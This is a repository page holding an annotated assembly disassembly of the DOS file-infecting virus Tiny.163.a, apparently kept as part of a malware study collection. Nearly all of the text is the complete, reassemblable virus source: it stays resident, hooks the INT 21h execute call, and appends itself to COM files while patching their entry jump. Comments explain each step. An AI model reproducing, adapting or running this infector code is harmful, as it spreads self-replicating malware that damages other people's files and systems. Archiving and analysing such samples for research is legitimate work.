-
Notifications
You must be signed in to change notification settings - Fork 2
/
Virus.DOS.Tiny.163.a.asm
147 lines (125 loc) · 4.15 KB
/
Virus.DOS.Tiny.163.a.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
; Disassembly of `Virus.DOS.Tiny.163.a`.
;
; Source: COM file (MD5: 464e8d72ca144494d97b42ede477c8a8).
;
; This virus belongs to the `Tiny Family` family, not `Tiny Virus`, although VSUM doesn't list a 163 bytes
; long version.
org 100h
; After boot, this memory area (256 bytes) is not used.
; See http://oopweb.com/Assembly/Documents/InterList/Volume/MEMORY.LST.
;
k_unused_memory_segment: equ 0x60
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; HOST
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
host:
dec bp
jmp_to_entry_point:
jmp word entry_point
jmp_to_entry_point_address: equ $-2
string_start: equ $-1
db "ello - This is a 100 COM test file, 1993", 0Ah, 0Dh
db 24h, 1Ah
times 41 db 41h
print_string:
mov ah,9 ; print to stdout
mov dx,string_start
int 21h
int 20h
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; VIRUS
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
virus_start:
dec bp ; this is a copy of the header; it's not directly executed,
jmp word $+(entry_point-jmp_to_entry_point) ; so ignore it.
virus_start_jmp_address: equ $-2
entry_point:
copy_in_memory:
mov bx,[jmp_to_entry_point_address]
mov cx,k_unused_memory_segment
mov es,cx
xor di,di
lea si,[bx+100h] ; = virus_start; 100h = virus_start - (entry_point-(jmp_to_entry_point+2))
mov cl,virus_end - virus_start
cld
rep movsb
pop ds ; 0 on COM execution
push ds
mov si,21h*4 ; int 21 (offset)
cmp byte [si+2],k_unused_memory_segment ; int 21 (segment)
jz short return_to_host
hijack_int_21:
mov di,v_addr_original_int21 - virus_start
mov cl,2
rep movsw
cli
mov word [si-4],new_int21 - virus_start
mov [si-2],es
sti
return_to_host:
push cs
push cs
pop ds
pop es
mov di,100h
push di
lea si,[bx+100h + host_original_header - virus_start]
mov cl,2
rep movsw
ret
new_int21:
cmp ah,4Bh ; execution?
jnz short return_to_original_int21
push ax
push bx
push dx
push cx
push ds
mov ax,3D92h ; open for r/w, with some exotic (and useless) sharing attributes
int 21h
mov bx,ax
call word move_to_file_start
mov ah,3Fh ; read header
mov cl,4
push cs
pop ds
mov dx,host_original_header-virus_start
int 21h
cmp byte [host_original_header-virus_start], 'M' ; is it an EXE file?
jz short close_file
mov al,2
call word move_file_pointer_partial_call ; ax=4202h - move to file end
mov [virus_start_jmp_address - virus_start],ax
mov cx,virus_end - virus_start
call word write_to_file
call word move_to_file_start
mov cl,4
call word write_to_file
close_file:
mov ah,3Eh ; close file
int 21h
pop ds
pop cx
pop dx
pop bx
pop ax
return_to_original_int21:
jmp word 000Bh:40EBh
v_addr_original_int21: equ $-4
write_to_file:
mov ah,40h
jmp word int21_partial_call
move_to_file_start:
xor al,al ; 4200h: go to start of file
move_file_pointer_partial_call:
xor cx,cx
mov ah,42h
int21_partial_call:
xor dx,dx
int 21h
ret
host_original_header:
jmp short $+(print_string-host)
nop
db 'H' ; part of the 'Hello...' string
virus_end: equ $